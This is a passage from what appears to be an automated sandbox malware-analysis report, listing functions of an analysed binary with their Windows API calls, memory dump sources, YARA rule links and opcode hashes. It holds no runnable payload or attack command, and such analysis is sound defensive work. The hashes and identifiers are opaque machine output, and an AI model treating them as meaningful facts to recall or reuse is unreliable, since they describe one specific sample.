                                                                                        • Opcode Fuzzy Hash: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
                                                                                        • Instruction Fuzzy Hash: 35B012CB2680407C321761081E02E3B071CC0CAF20330D06EF42DC4480E8454C010533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0036D343,00000001,?,?,?,00000000,0037551D,?,?,?), ref: 00369F9E
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0037551D,?,?,?,?,?,00374FC7,?), ref: 00369FE5
                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0036D343,00000001,?,?), ref: 0036A011
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$Handle
                                                                                        • String ID:
                                                                                        • API String ID: 4209713984-0
                                                                                        • Opcode ID: 0e737175e314012d2191ac1bd07a11bd0580d964738aafa825d78cf2a46fc9d9
                                                                                        • Instruction ID: bcf7c35072c9266449ec111191044a727ac44cc01387955a23b15728a04c3607
                                                                                        • Opcode Fuzzy Hash: 0e737175e314012d2191ac1bd07a11bd0580d964738aafa825d78cf2a46fc9d9
                                                                                        • Instruction Fuzzy Hash: C131B171208305AFDB16CF24D818B6E77A9FF84711F05891EF981AB294C775AD48CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0036C27E: _wcslen.LIBCMT ref: 0036C284
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A2D9
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A30C
                                                                                        • GetLastError.KERNEL32(?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A329
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2260680371-0
                                                                                        • Opcode ID: 86c07ad34b9c786b3b5b2dbaa7ab2922ec5dcdcd5309fef30e1c5a8dc1fe1954
                                                                                        • Instruction ID: d731d80e32b3320f0d976751a130050523f4ec11e1158e4e8c95aac4a53b72d3
                                                                                        • Opcode Fuzzy Hash: 86c07ad34b9c786b3b5b2dbaa7ab2922ec5dcdcd5309fef30e1c5a8dc1fe1954
                                                                                        • Instruction Fuzzy Hash: 5701D839100A106AEF23AB754C49BFE775CAF09780F14C415F902F6299D754CA81CEB6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0038B8B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Info
                                                                                        • String ID:
                                                                                        • API String ID: 1807457897-3916222277
                                                                                        • Opcode ID: 209060d9d4264143f1261b75fa61a219461b45db68d9058aae3d6d9cd9da4203
                                                                                        • Instruction ID: 1e8ce6d83912723e40514325ee06ca16f00b0c670fac131bb9605746dd627ec4
                                                                                        • Opcode Fuzzy Hash: 209060d9d4264143f1261b75fa61a219461b45db68d9058aae3d6d9cd9da4203
                                                                                        • Instruction Fuzzy Hash: 2E41F57050438D9FDB239E688C84BE6FBADEB45304F1404EDE69AC6242D335AA458F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0038AFDD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID: LCMapStringEx
                                                                                        • API String ID: 2568140703-3893581201
                                                                                        • Opcode ID: ecb210d873d19454d055ec17c7fc5bef577d1631a788652c9275f5beece13dbf
                                                                                        • Instruction ID: 16c378bc9ea4b2a8b50c0580d85da06b4b4faa550ac5203d0af4c5dbc1a91d85
                                                                                        • Opcode Fuzzy Hash: ecb210d873d19454d055ec17c7fc5bef577d1631a788652c9275f5beece13dbf
                                                                                        • Instruction Fuzzy Hash: 4C01E572504219BBDF13AF90DC06DEE7F66EF09750F054156FE186A160CB368A31AB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0038A56F), ref: 0038AF55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                        • API String ID: 2593887523-3084827643
                                                                                        • Opcode ID: 9031481960a7ddda2228c16f65e870288dc1da20233bdd2c68a9d870ff67f0b6
                                                                                        • Instruction ID: 0d5692a7007806106bfafd5184417f064221c224caf3af2deaccd48c7553700c
                                                                                        • Opcode Fuzzy Hash: 9031481960a7ddda2228c16f65e870288dc1da20233bdd2c68a9d870ff67f0b6
                                                                                        • Instruction Fuzzy Hash: A2F0E971645208BFDF176F55CC02C9E7F65EF04711F404096FD099A260DB725E109B8A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc
                                                                                        • String ID: FlsAlloc
                                                                                        • API String ID: 2773662609-671089009
                                                                                        • Opcode ID: a5f3c9917067356a89b227854801f57034b4909ce175ea73dbbd0add16f068e3
                                                                                        • Instruction ID: 810f9c1405f9ecbdf1bc7d0fcdc14378f469571fde1db9fffa9f06ab3ffbe23f
                                                                                        • Opcode Fuzzy Hash: a5f3c9917067356a89b227854801f57034b4909ce175ea73dbbd0add16f068e3
                                                                                        • Instruction Fuzzy Hash: ECE0E5716453187BDA13BB65DC129AEBB68DB04721F01019BF805A7290DE725E0087DA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 5b3cb656c0c2f41ae6132004d4c5cc83f173894f184376825b045f46771794dc
                                                                                        • Instruction ID: 04c905a5084346709a6b56c718675343d2da1ec35115bfbdd144735f725633f6
                                                                                        • Opcode Fuzzy Hash: 5b3cb656c0c2f41ae6132004d4c5cc83f173894f184376825b045f46771794dc
                                                                                        • Instruction Fuzzy Hash: 92B012D5268000BC3217F2465C03E37010CC5CAF10330C07FFC2DC5680D844AC040532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 34e8e53de8a1527af93c4c75f26a1b34358d8a9dbb94869ab1b5e4083f4de58b
                                                                                        • Instruction ID: 59e1fb83b4f69a4c5114f00aa75f15dff29b6fa63859c090917c9148c44ac4d0
                                                                                        • Opcode Fuzzy Hash: 34e8e53de8a1527af93c4c75f26a1b34358d8a9dbb94869ab1b5e4083f4de58b
                                                                                        • Instruction Fuzzy Hash: E2B012D92AC100BC3217E18A5C03E77011CC1C9F10330C07EF82DC5480D8446C000632
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 8e2479b1ddad2ac4db297b35611ae329bc9f518b25944794cf568737beda1a6f
                                                                                        • Instruction ID: bebc4bbc424628a5915c9e1aab729a6abe3e771f00f98417f2a9b99cbeebba6f
                                                                                        • Opcode Fuzzy Hash: 8e2479b1ddad2ac4db297b35611ae329bc9f518b25944794cf568737beda1a6f
                                                                                        • Instruction Fuzzy Hash: 77B012D92A8100BC3217B1865C03D37011CC1CAF10330C47EFC29D4880D844AC000432
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: c6d2251eae41b9967fae8c8f300cdd967e1d48ee9cd2625c0ea871cfb5f5d948
                                                                                        • Instruction ID: 6b3531876b771359fa0777813345a643f316a81e8f8311e74bde98e97b18693d
                                                                                        • Opcode Fuzzy Hash: c6d2251eae41b9967fae8c8f300cdd967e1d48ee9cd2625c0ea871cfb5f5d948
                                                                                        • Instruction Fuzzy Hash: CFB012E5268000BC3217E1475D03E37010CC1C9F10330C07EF82DC5480DC446E010532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: c9188a45c8e064b2d8d48714890acd7498231d413178f429f35d17037d7cb8e7
                                                                                        • Instruction ID: 8d4d1463e9f7f06351a67ed05e6c72ceb2a1c901d4c2a13da5d6de9051315496
                                                                                        • Opcode Fuzzy Hash: c9188a45c8e064b2d8d48714890acd7498231d413178f429f35d17037d7cb8e7
                                                                                        • Instruction Fuzzy Hash: 1EB012E5268000BC3217E1475C03E77010CC1C9F10330C07EF82DC5480D8446D000532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 17202b583d3d40ab76ef6f61ac0cecb3eb6c5cb61a36c560fea567c151aabf4c
                                                                                        • Instruction ID: 14dab3c13cc615f3de776d6957ec526657e0510d8a74005405ec1e48f8b45272
                                                                                        • Opcode Fuzzy Hash: 17202b583d3d40ab76ef6f61ac0cecb3eb6c5cb61a36c560fea567c151aabf4c
                                                                                        • Instruction Fuzzy Hash: 49B012E5268100BC3257E1465C03E37010CC1C9F10330C17EF82DC5480D8446D400532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: efc3e3f10f88fbbf2ad8c944493602dd40e9dab9ce6e395e6e902d0fa28012b7
                                                                                        • Instruction ID: fd1595737e3422cc01d45708be95563ebd62b922b26bf2213e7e248fd6b2ffa9
                                                                                        • Opcode Fuzzy Hash: efc3e3f10f88fbbf2ad8c944493602dd40e9dab9ce6e395e6e902d0fa28012b7
                                                                                        • Instruction Fuzzy Hash: 67B012E6268000BC3217F1465C03E37010CC1CAF10330C07EFC2DC5480D844AD000532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
